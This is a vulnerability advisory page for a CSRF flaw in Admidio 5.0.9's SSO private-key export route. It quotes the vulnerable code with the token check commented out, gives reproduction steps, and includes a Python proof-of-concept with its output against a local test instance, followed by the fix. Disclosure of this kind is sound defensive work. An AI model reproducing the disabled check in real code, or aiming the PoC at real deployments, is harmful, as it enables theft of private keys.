Admidio CVE-2026-47232
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The sensitive mode=export action in modules/sso/keys.php exports a PKCS#12 bundle containing the configured private key and certificate, but the CSRF validation line is commented out. A forged cross-site POST from an administrator session can therefore trigger private key export without a valid form token.
Vulnerable Code Links
- https://github.com/Admidio/admidio/blob/v5.0.9/modules/sso/keys.php#L83-L94
- https://github.com/Admidio/admidio/blob/v5.0.9/src/SSO/Service/KeyService.php#L108-L150
Vulnerable Code
// modules/sso/keys.php
case 'export':
// SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$keyService = new KeyService($gDb);
$password = admFuncVariableIsValid($_POST, 'key_password', 'string');
$keyService->exportToPkcs12($getKeyUUID, $password);
break;// src/SSO/Service/KeyService.php
public function exportToPkcs12(string $keyUUID, string $password = '') {
$ssoKey = new Key($this->db);
$ssoKey->readDataByUuid($keyUUID);
...
openssl_pkcs12_export($certificate, $pkcs12, $privateKey, $password, ["friendly_name" => $name]);
header('Content-Type: application/x-pkcs12');
header('Content-Disposition: attachment; filename="' . $filename . '.p12"');
echo $pkcs12;
exit;
}What Does The Code Mean
The export route accepts a key UUID and export password from the request, then returns a PKCS#12 bundle containing the private key material and certificate as a direct browser download.
Why The Code Is Vulnerable
The route is a sensitive action and should require a valid anti-CSRF token. Because the validation call is commented out, any attacker-controlled page can force an authenticated administrator’s browser to perform the export request.
Verification Environment
- Application: Admidio
v5.0.9 - Runtime: Dockerized Admidio + MariaDB on
http://localhost:18080 - Validation mode: real deployed application, not isolated unit tests
Steps To Reproduce
- Log in as an administrator.
- Create or seed an SSO key pair.
- Send a POST request to
/modules/sso/keys.php?mode=export&uuid=<key-uuid>with onlykey_password=ExportPass123!and noadm_csrf_token. - Verify that the response returns
application/x-pkcs12and that the returned file parses successfully with OpenSSL.
PoC Script
import os
from pathlib import Path
from helpers import BASE_URL, login, new_session, save_json, save_text
KEY_UUID = os.environ["ADMIDIO_KEY_UUID"]
def main():
session = new_session()
login_result = login(session, "admin", "AdminPass123!")
resp = session.post(
f"{BASE_URL}/modules/sso/keys.php?mode=export&uuid={KEY_UUID}",
data={"key_password": "ExportPass123!"},
)
resp.raise_for_status()
Path("/home/ubuntu/bughunting/admidio/runtime_validation/output/exported_key.p12").write_bytes(resp.content)
save_json(
"pkcs12_export_csrf_result.json",
{
"login": login_result,
"status_code": resp.status_code,
"content_type": resp.headers.get("Content-Type"),
"content_length": len(resp.content),
"content_disposition": resp.headers.get("Content-Disposition"),
},
)
if __name__ == "__main__":
main()PoC Output
{
"content_disposition": "attachment; filename=\"Runtime_Test_Key.p12\"",
"content_length": 2644,
"content_type": "application/x-pkcs12",
"login": {
"cookies": {
"ADMIDIO_admidio_adm_SESSION_ID": "jpk70tcvbaq3gof7lqdq6penkb"
},
"csrf": "ztUJwMPATEKBdu2Qw3oJlnD0WeWLcn",
"json": {
"status": "success",
"url": "http://localhost:18080/modules/overview.php"
},
"status_code": 200
},
"status_code": 200
}
MAC: sha256, Iteration 2048
MAC length: 32, salt length: 8
PKCS7 Encrypted data: PBES2, PBKDF2, AES-256-CBC, Iteration 2048, PRF hmacWithSHA256
Certificate bag
PKCS7 Data
Shrouded Keybag: PBES2, PBKDF2, AES-256-CBC, Iteration 2048, PRF hmacWithSHA256Impact
A cross-site request can trigger private key export in an administrator browser context. Same-origin policy normally prevents direct cross-site reading of the response, so the practical impact is lower than a direct exfiltration bug, but the application still performs a sensitive secret-export action without CSRF protection.
Remediation And Suggestions
Restore CSRF validation and require a POST body token before exporting private key material.
case 'export':
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$keyService = new KeyService($gDb);
$password = admFuncVariableIsValid($_POST, 'key_password', 'string');
$keyService->exportToPkcs12($getKeyUUID, $password);
break;For additional hardening, consider requiring re-authentication or current-password confirmation before any private-key export.
AnalysisAI
Missing CSRF protection on the PKCS#12 private key export endpoint in Admidio v5.0.9 allows a network-based attacker to force an authenticated administrator's browser to trigger an unauthorized SSO private key export. The SecurityUtils::validateCsrfToken() call in modules/sso/keys.php was commented out on the 'export' case, permitting forged cross-site POST requests to invoke KeyService::exportToPkcs12() without a valid form token. While same-origin policy prevents the attacker from reading the streamed .p12 response directly, a working proof-of-concept is publicly documented in the GitHub security advisory and a vendor-confirmed fix is available in version 5.0.10.
Technical ContextAI
Admidio is an open-source PHP membership management application whose SSO module manages cryptographic key pairs for single sign-on federation. The vulnerable component spans two files: modules/sso/keys.php (the request dispatcher) and src/SSO/Service/KeyService.php (which calls PHP's native openssl_pkcs12_export() to bundle the private key and certificate into a PKCS#12 container and streams it as a browser download). CWE-352 (Cross-Site Request Forgery) identifies the root cause: the application processes a sensitive, state-affecting action - exporting secret key material - without verifying that the request originated from the application's own UI via a bound anti-CSRF token. The CPE package identifier is pkg:composer/admidio/admidio, and the flaw is pinned to the v5.0.9 codebase per vendor-published source references at https://github.com/Admidio/admidio/blob/v5.0.9/modules/sso/keys.php#L83-L94 and https://github.com/Admidio/admidio/blob/v5.0.9/src/SSO/Service/KeyService.php#L108-L150.
RemediationAI
Upgrade Admidio to version 5.0.10, which restores the CSRF token validation call (SecurityUtils::validateCsrfToken($_POST['adm_csrf_token'])) in the 'export' case of modules/sso/keys.php. The fix is confirmed by the vendor advisory at https://github.com/Admidio/admidio/security/advisories/GHSA-4rgq-38mh-9xqg and by Composer package metadata marking <= 5.0.9 as vulnerable and 5.0.10 as the patched release. If immediate upgrade is not possible, restrict access to /modules/sso/keys.php via web server ACLs to trusted administrator IP ranges only - this reduces attack surface but does not eliminate CSRF risk for administrators browsing from within an allowed range. The vendor additionally recommends requiring re-authentication or current-password confirmation before any private key export as a defense-in-depth measure; note that this requires additional development effort and is not present in the default application.
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packe
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to se
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which mak
The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a
The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly
A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Rated hig
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
In OpenSSL 1.1.0 before 1.1.0d, if a malicious server supplies bad parameters for a DHE or ECDHE key exchange then this
A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL proto
Same weakness CWE-352 – Cross-Site Request Forgery (CSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-4rgq-38mh-9xqg